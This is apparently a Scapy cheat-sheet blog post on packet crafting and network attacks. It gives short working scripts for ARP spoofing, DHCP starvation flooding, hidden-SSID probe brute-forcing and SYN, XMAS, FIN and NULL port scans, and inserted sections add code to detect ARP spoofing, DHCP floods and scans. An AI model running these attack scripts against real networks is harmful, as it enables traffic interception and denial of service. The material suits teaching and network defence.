Easy Network Hacking – Scapy

Detect Sniffer

Detects hosts on the network whose interface is in promiscuous mode (a sign that a sniffer is running)

is_promisc("ip_address")
promiscping("192.168.1.0/24", timeout=2)


Create Packet

+ TCP

tcp = TCP()
tcp.show()
tcp.display()
tcp.dport = 80


+ ICMP

icmp = ICMP()
icmp.show()
icmp.display()
icmp.type = "echo-request"


+ IP

ip = IP()
ip.show()
ip.display()
ip.src = RandIP()   # random source address (RandIP() is the Scapy volatile type for IPv4 addresses)


+ ARP

arp = ARP()
arp.show()
arp.display()
arp.hwsrc = RandMAC()


+ UDP

udp = UDP()
udp.show()
udp.display()
udp.dport = 53


+ DNS

dns = IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1, qd=DNSQR(qname="www.google.com"))
a = sr1(dns, verbose=0)   # sr1() returns the first answer packet (None on timeout), not a pair
print(a[DNS].summary())


+ DHCP 

dhcp = BOOTP() / DHCP()   # BOOTP is the outer layer; the DHCP options ride inside it
dhcp.show()
dhcp.display()
dhcp[BOOTP].op = "BOOTREQUEST"
dhcp[BOOTP].giaddr = "gateway_ip_address"


Working with Packets

+ It's like a list (Python)

packets = sniff(count=7)
for pkt in packets:
    print(pkt.summary())   # do something with each packet

+ Summary of captured packets

packets = sniff(count=7)
packets.summary()


+ Summary of captured packets with packet number

packets = sniff(count=7)
packets.nsummary()


+ Accessing members of the packet list (here the 3rd packet)

packets = sniff(count=7)
pkt = packets[2]


Port Scan

+ SYN Scan

syn = IP(dst="72.14.207.x")/TCP(dport=80,flags="S")
sr1(syn)


+ ACK Scan

ack = IP(dst="72.14.207.x")/TCP(dport=80,flags="A")
sr1(ack)


+ UDP Scan

udp = IP(dst="192.168.1.x")/UDP(dport=[443,666])
sr(udp)


+ XMAS Scan

xmas = IP(dst=dst_ip)/TCP(dport=dst_port,flags="FPU")
sr1(xmas, timeout=2)


+ FIN Scan

fin = IP(dst=dst_ip)/TCP(dport=dst_port,flags="F")
sr1(fin, timeout=10)

+ NULL Scan

null = IP(dst=dst_ip)/TCP(dport=dst_port,flags="")
sr1(null, timeout=10)


Sniff

sniff(iface='eth0', filter='arp', count=5)

sniff(iface='wlan0', count=7, prn=Beacon)     # Beacon: a user-defined callback called once per captured packet

sniff(offline='cypm.pcap', prn=Analiz)        # offline= reads packets from a pcap file instead of an interface


Sniffing at Wireless Networks

packets = sniff(iface='wlan0mon', prn=KablosuzAnaliz)   # KablosuzAnaliz: user-defined per-packet callback; wlan0mon is a monitor-mode interface

pkt.type
#(Management(0), Control(1), Data(2))

pkt.subtype
#(Beacon(8), ProbeReq(4), ProbeResp(5))

pkt.info
#(SSID info)


ord(pkt[Dot11Elt:3].info)
#(channel number, taken from the third tagged element, the DS Parameter Set)


256-(ord(pkt.notdecoded[-4:-3]))
#(signal strength, read from the undecoded RadioTap bytes)
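The fields read above (pkt.type, pkt.subtype, pkt.info and the third Dot11Elt) come from the 802.11 management frame that Scapy decodes as Dot11/Dot11Elt. The following added example, which is not part of the original post, parses that frame in plain Python on a constructed beacon so the layout is visible: the frame-control byte that yields type and subtype, the 24-byte header, the 12 fixed bytes of a beacon body and the ID/length/value elements behind them. It also marks beacons whose SSID element is empty or all zeros, which is how hidden APs announce themselves. The function names, the BSSID and the SSID values are mine; the RadioTap header, and therefore the signal-strength trick, is out of scope.

```python
import struct

# Values of the 802.11 frame-control "type" and management "subtype" fields
TYPE_NAMES = {0: "Management", 1: "Control", 2: "Data"}
MGMT_SUBTYPES = {4: "ProbeReq", 5: "ProbeResp", 8: "Beacon"}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame_control(fc0):
    """Split the first frame-control byte into (version, type, subtype)."""
    return fc0 & 0x03, (fc0 >> 2) & 0x03, (fc0 >> 4) & 0x0F


def parse_tagged_params(body):
    """Walk the ID/length/value elements; Scapy shows these as chained Dot11Elt layers."""
    elts = []
    i = 0
    while i + 2 <= len(body):
        eid, elen = body[i], body[i + 1]
        data = body[i + 2:i + 2 + elen]
        if len(data) < elen:            # truncated element: stop instead of mis-parsing
            break
        elts.append((eid, data))
        i += 2 + elen
    return elts


def parse_mgmt_frame(frame):
    """Extract type/subtype, BSSID, SSID and channel from a raw 802.11 management frame
    (no RadioTap header in front)."""
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte 802.11 header")
    _, ftype, subtype = parse_frame_control(frame[0])
    info = {"type": TYPE_NAMES.get(ftype, ftype), "subtype": subtype,
            "bssid": mac_str(frame[16:22]), "ssid": None, "hidden": None, "channel": None}
    if ftype != 0:
        return info                      # only management frames carry these elements
    info["subtype"] = MGMT_SUBTYPES.get(subtype, subtype)
    body = frame[24:]
    if subtype in (5, 8):                # Beacon/ProbeResp: 12 bytes of fixed fields first
        body = body[12:]
    for eid, data in parse_tagged_params(body):
        if eid == 0:                     # SSID element (pkt.info in Scapy)
            info["ssid"] = data.decode("utf-8", "replace")
            # Hidden APs beacon with an empty or all-zero SSID
            info["hidden"] = len(data) == 0 or data == b"\x00" * len(data)
        elif eid == 3 and len(data) == 1:   # DS Parameter Set: the channel number
            info["channel"] = data[0]
    return info


def build_beacon(bssid, ssid, channel):
    """Construct a minimal beacon frame for testing (constructed input, not a real capture)."""
    header = (bytes([0x80, 0x00])        # type 0 (Management), subtype 8 (Beacon)
              + b"\x00\x00"              # duration
              + b"\xff" * 6              # addr1: broadcast
              + bssid + bssid            # addr2 (transmitter), addr3 (BSSID)
              + b"\x00\x00")             # sequence control
    fixed = struct.pack("<QHH", 0, 100, 0x0431)   # timestamp, beacon interval, capabilities
    tags = (bytes([0, len(ssid)]) + ssid              # SSID
            + bytes([1, 4]) + b"\x82\x84\x8b\x96"     # supported rates
            + bytes([3, 1, channel]))                 # DS parameter set
    return header + fixed + tags


if __name__ == "__main__":
    bssid = bytes.fromhex("4ef20880aabb")           # constructed BSSID
    for name in (b"LabNet", b""):
        print(parse_mgmt_frame(build_beacon(bssid, name, 6)))
```

On a live capture the same parser can be fed with `bytes(pkt[Dot11])` from the sniff callback, which strips the RadioTap header that Scapy puts in front of the frame.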


Identifying Active Computers

Detects active hosts on the local network by ARP-pinging the whole range

arping("192.168.1.0/24")


Ping

Sends an ICMP echo request (ping) and waits for the reply.

#!/usr/bin/env python

import sys
from scapy.all import *

packet = IP(dst='ip_for_ping') / ICMP()
sr1(packet)


Traceroute

traceroute(["www.canyoupwn.me"],maxttl=20)


Nslookup

Sends a DNS query for the hostname given on the command line and prints the first answer record.

#!/usr/bin/env python

import sys
from scapy.all import *

host = sys.argv[1]
result = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1, qd=DNSQR(qname=host)), verbose=0)
print(result[DNSRR].rdata)   # rdata of the first resource record in the answer


ARPSpoof

It is used to poison the ARP table.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import time
from scapy.all import *

conf.verb = 0

op          = 2                      # ARP reply (is-at)
attackerMAC = 'c4:6e:1f:17:ed:b3'
gateway     = '192.168.2.1'
targetIP    = '192.168.2.48'

arp = ARP(op=op, psrc=gateway, pdst=targetIP, hwsrc=attackerMAC)
print("Started ARP Attack ... ")
try:
    while 1:
        send(arp, iface='wlan0')
        time.sleep(2)

except KeyboardInterrupt:
    print("Stopped Attack")
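What the script above leaves on the wire is an unsolicited ARP reply that claims the gateway's IP with a different MAC, repeated every two seconds. The added example below, which is not part of the original post, shows the detection side: it remembers the first MAC seen for each IP (the arpwatch approach), optionally pins static entries such as the gateway, and flags every later claim that disagrees. The observations are constructed; the gateway and target addresses mirror the script, the MACs are made up, and `ArpWatch`, `scan` and `arp_prn` are my names. Only `arp_prn` needs Scapy.

```python
from collections import defaultdict

# Constructed ARP observations (not a capture): (op, sender_ip, sender_mac).
# op 1 = who-has (request), op 2 = is-at (reply), as in Scapy's ARP() layer.
SAMPLE_ARP = [
    (1, "192.168.2.48", "aa:bb:cc:dd:ee:01"),   # target asks who has the gateway
    (2, "192.168.2.1",  "00:11:22:33:44:55"),   # real gateway answers
    (2, "192.168.2.1",  "c4:6e:1f:17:ed:b3"),   # same IP now claimed by another MAC
    (2, "192.168.2.1",  "c4:6e:1f:17:ed:b3"),   # repeated every 2 s while the tool runs
    (1, "192.168.2.48", "aa:bb:cc:dd:ee:01"),   # target's own traffic is unchanged
]


class ArpWatch:
    """Remember the first MAC seen for each IP and flag any later claim with a different MAC.
    `pinned` holds static IP->MAC entries (e.g. the gateway) trusted over learned ones."""

    def __init__(self, pinned=None):
        self.learned = {}                                 # ip -> first MAC seen
        self.pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
        self.changes = defaultdict(int)                   # (ip, mac) -> how often flagged

    def observe(self, op, psrc, hwsrc):
        if op not in (1, 2):
            return None
        hwsrc = hwsrc.lower()
        if psrc in self.pinned:
            expected, source = self.pinned[psrc], "pinned"
        else:
            expected, source = self.learned.setdefault(psrc, hwsrc), "learned"
        if hwsrc == expected:
            return None
        self.changes[(psrc, hwsrc)] += 1
        return (f"ARP conflict: {psrc} claimed by {hwsrc} "
                f"({source} MAC is {expected}, op={op}, seen {self.changes[(psrc, hwsrc)]}x)")


def scan(events, pinned=None):
    """Run a batch of observations through ArpWatch and return all alerts in order."""
    watch = ArpWatch(pinned)
    return [a for a in (watch.observe(*e) for e in events) if a]


def arp_prn(watch):
    """Build a Scapy sniff() callback that feeds the watcher (requires Scapy)."""
    from scapy.all import ARP        # lazy import: the detector itself needs no Scapy

    def prn(pkt):
        if ARP in pkt:
            alert = watch.observe(pkt[ARP].op, pkt[ARP].psrc, pkt[ARP].hwsrc)
            if alert:
                print(alert)
    return prn


if __name__ == "__main__":
    for line in scan(SAMPLE_ARP, pinned={"192.168.2.1": "00:11:22:33:44:55"}):
        print(line)
```

For live monitoring, `sniff(filter="arp", store=0, prn=arp_prn(ArpWatch(pinned={...})))` runs the same logic per packet. Pinning the gateway matters: a learned-only watcher that happens to start while the spoof is already running would record the wrong MAC as the baseline.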


DHCP Attack

#!/usr/bin/env python

import sys
from scapy.all import *

conf.iface = 'wlan0'
conf.verb  = 0

print("DHCP DoS Attack ...")

pkt = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, b'0123456789abcdef'))   # chaddr is a byte field, so the alphabet is bytes
pkt /= DHCP(options=[("message-type", 'discover'), 'end'])

sendp(pkt, loop=1)
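The traffic this script produces has a clear shape: a burst of DISCOVER messages in which every request carries a chaddr that has never been seen before. The added example below, which is not part of the original post, reports that shape from a list of DHCP observations by splitting the DISCOVER stream into fixed windows and flagging windows where the rate is high and nearly every request has a new chaddr, the second condition separating a starvation attempt from a busy but honest LAN. `message_type()` reads the Scapy-style options list the script builds (and the numeric form a parsed packet carries). The observations, thresholds and function names are mine; only `scapy_event()` needs Scapy.

```python
from collections import defaultdict

# DHCP message-type codes (option 53); Scapy accepts either the number or the name
DHCP_TYPES = {1: "discover", 2: "offer", 3: "request", 4: "decline", 5: "ack",
              6: "nak", 7: "release", 8: "inform"}


def message_type(options):
    """Read the message type from a Scapy-style DHCP options list such as
    [("message-type", "discover"), ("param_req_list", ...), "end"]."""
    for opt in options:
        if isinstance(opt, tuple) and opt[0] == "message-type":
            value = opt[1]
            return DHCP_TYPES.get(value, value) if isinstance(value, int) else value
    return None


# Constructed observations (not a capture): (timestamp_s, chaddr, message_type).
# A real client reuses one chaddr across retries; the flood below never does.
NORMAL = [
    (0.0, "aa:bb:cc:00:00:01", "discover"),
    (3.0, "aa:bb:cc:00:00:01", "discover"),   # retry from the same client
    (3.1, "aa:bb:cc:00:00:01", "request"),
    (9.0, "aa:bb:cc:00:00:02", "discover"),
]
FLOOD = [(10.0 + i * 0.02, f"02:00:00:00:{i // 256:02x}:{i % 256:02x}", "discover")
         for i in range(200)]                 # 200 DISCOVERs from 200 MACs in 4 s


def starvation_report(events, window=5.0, max_rate=5.0, min_unique_ratio=0.9):
    """Split DISCOVERs into fixed windows and report those where the rate exceeds
    max_rate per second AND at least min_unique_ratio of them carry a new chaddr."""
    discovers = [(ts, mac) for ts, mac, mtype in events if mtype == "discover"]
    if not discovers:
        return []
    start = discovers[0][0]
    buckets = defaultdict(list)
    for ts, mac in discovers:
        buckets[int((ts - start) // window)].append(mac)
    report = []
    for idx in sorted(buckets):
        macs = buckets[idx]
        rate = len(macs) / window
        unique_ratio = len(set(macs)) / len(macs)
        if rate > max_rate and unique_ratio >= min_unique_ratio:
            report.append({"window": idx, "discovers": len(macs),
                           "rate_per_s": rate, "unique_ratio": unique_ratio})
    return report


def scapy_event(pkt):
    """Turn a sniffed DHCP packet into the tuple form above (requires Scapy)."""
    from scapy.all import BOOTP, DHCP           # lazy import: the analysis runs without Scapy
    if BOOTP in pkt and DHCP in pkt:
        chaddr = ":".join(f"{b:02x}" for b in bytes(pkt[BOOTP].chaddr)[:6])
        return (float(pkt.time), chaddr, message_type(pkt[DHCP].options))
    return None


if __name__ == "__main__":
    for entry in starvation_report(NORMAL + FLOOD):
        print(entry)
```

A flood that reuses a single chaddr would fail the uniqueness test by design; a server-side pool that empties under such traffic shows up instead as DISCOVERs without matching OFFERs, which is a separate check.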


SYN Scan

Sends a single TCP SYN segment to one port.

#!/usr/bin/env python

import sys
from scapy.all import *

syn = IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="S")

sr1(syn, timeout=10)   # timeout is an argument of sr1(), not part of the packet
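From the defender's side, the probes in the Port Scan section above and this SYN script are exactly the patterns an IDS looks for: a bare SYN sent to many ports of one host in a short time, and flag combinations (NULL, FIN, XMAS) that a normal TCP stack never emits on a fresh connection. The following added example, which is not part of the original post, runs that detection over constructed packet events and returns the alerts. The event tuples, thresholds and class names are mine; `scapy_event()`, which converts a sniffed packet into that tuple, assumes Scapy 2.4 or later, where `pkt[TCP].flags` stringifies as flag letters. The detector itself needs only the standard library.

```python
from collections import defaultdict, deque

# Constructed sample events (not a real capture): (timestamp, src_ip, dst_ip, dst_port, flags)
# "flags" uses Scapy's letters: S=SYN, A=ACK, F=FIN, P=PSH, U=URG.
SAMPLE_EVENTS = [
    (0.0, "10.0.0.5", "10.0.0.9", 80, "S"),      # ordinary connection attempt
    (0.1, "10.0.0.5", "10.0.0.9", 80, "A"),
]
# 12 SYNs from one source to 12 different ports within ~1.1 s: the SYN-scan pattern
SAMPLE_EVENTS += [(1.0 + i * 0.1, "10.0.0.7", "10.0.0.9", port, "S")
                  for i, port in enumerate(range(20, 32))]
SAMPLE_EVENTS += [
    (5.0, "10.0.0.8", "10.0.0.9", 443, "FPU"),   # XMAS probe
    (5.5, "10.0.0.8", "10.0.0.9", 443, ""),      # NULL probe
    (6.0, "10.0.0.8", "10.0.0.9", 443, "F"),     # FIN probe
]

# Flag combinations that never start a legitimate connection
PROBE_SIGNATURES = {"": "NULL scan", "F": "FIN scan", "FPU": "XMAS scan"}


def classify_flags(flags):
    """Return the scan type for an abnormal flag combination, else None.
    Flags are sorted so the order Scapy prints them in does not matter."""
    return PROBE_SIGNATURES.get("".join(sorted(flags)))


class SynFanoutDetector:
    """Sliding-window count of distinct destination ports hit by SYNs per (src, dst)."""

    def __init__(self, window=2.0, threshold=10):
        self.window = window
        self.threshold = threshold
        self.history = defaultdict(deque)   # (src, dst) -> deque of (timestamp, dport)
        self.alerted = set()                # alert once per (src, dst) pair

    def observe(self, ts, src, dst, dport):
        q = self.history[(src, dst)]
        q.append((ts, dport))
        while q and ts - q[0][0] > self.window:   # drop entries older than the window
            q.popleft()
        ports = {p for _, p in q}
        if len(ports) >= self.threshold and (src, dst) not in self.alerted:
            self.alerted.add((src, dst))
            return f"possible SYN scan: {src} -> {dst}, {len(ports)} ports in {self.window}s"
        return None


def run_detection(events, window=2.0, threshold=10):
    """Feed events through both checks and return the alerts in order of occurrence."""
    fanout = SynFanoutDetector(window, threshold)
    alerts = []
    for ts, src, dst, dport, flags in events:
        kind = classify_flags(flags)
        if kind:
            alerts.append(f"{kind} probe: {src} -> {dst}:{dport}")
        if "".join(sorted(flags)) == "S":          # bare SYN, no ACK
            alert = fanout.observe(ts, src, dst, dport)
            if alert:
                alerts.append(alert)
    return alerts


def scapy_event(pkt):
    """Convert a sniffed Scapy packet into the event tuple above (requires Scapy)."""
    from scapy.all import IP, TCP   # imported lazily so the detector runs without Scapy
    if IP in pkt and TCP in pkt:
        return (float(pkt.time), pkt[IP].src, pkt[IP].dst,
                int(pkt[TCP].dport), str(pkt[TCP].flags))
    return None


if __name__ == "__main__":
    for line in run_detection(SAMPLE_EVENTS):
        print(line)
```

For live use, keep one `SynFanoutDetector` instance and call `classify_flags()` and `observe()` from the sniff callback on the tuple `scapy_event()` returns; the window and threshold are the knobs to tune against the normal connection fan-out of the monitored hosts.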


SSID Brute-Force

This method can be used if there is a hidden AP device and no clients are connected.

#!/usr/bin/env python

from scapy.all import *

ssidlist = ["Hidden", "James", "Test", "HiddenSSID"]

broadmac = "ff:ff:ff:ff:ff:ff"
client   = "bb:bb:bb:bb:bb:bb"
AP_mac   = "4E:f2:08:80:aa:bb"
for ssid in ssidlist:

    probe  = RadioTap()
    probe /= Dot11(type=0, subtype=4, addr1=broadmac, addr2=client, addr3=broadmac)
    probe /= Dot11ProbeReq() / Dot11Elt(ID=0, info=ssid.strip().encode())   # SSID element
    probe /= Dot11Elt(ID=1, info=b"\x82\x84\x8b\x96\x24\x30\x48\x60\x6c")    # supported rates (bytes, not str)
    probe /= Dot11Elt(ID=3, info=b"\x06")                                    # DS parameter set: channel 6
    sendp(probe, iface="wlan0", count=3, inter=0.3)

Besim ALTINOK

Cyber Security Researcher
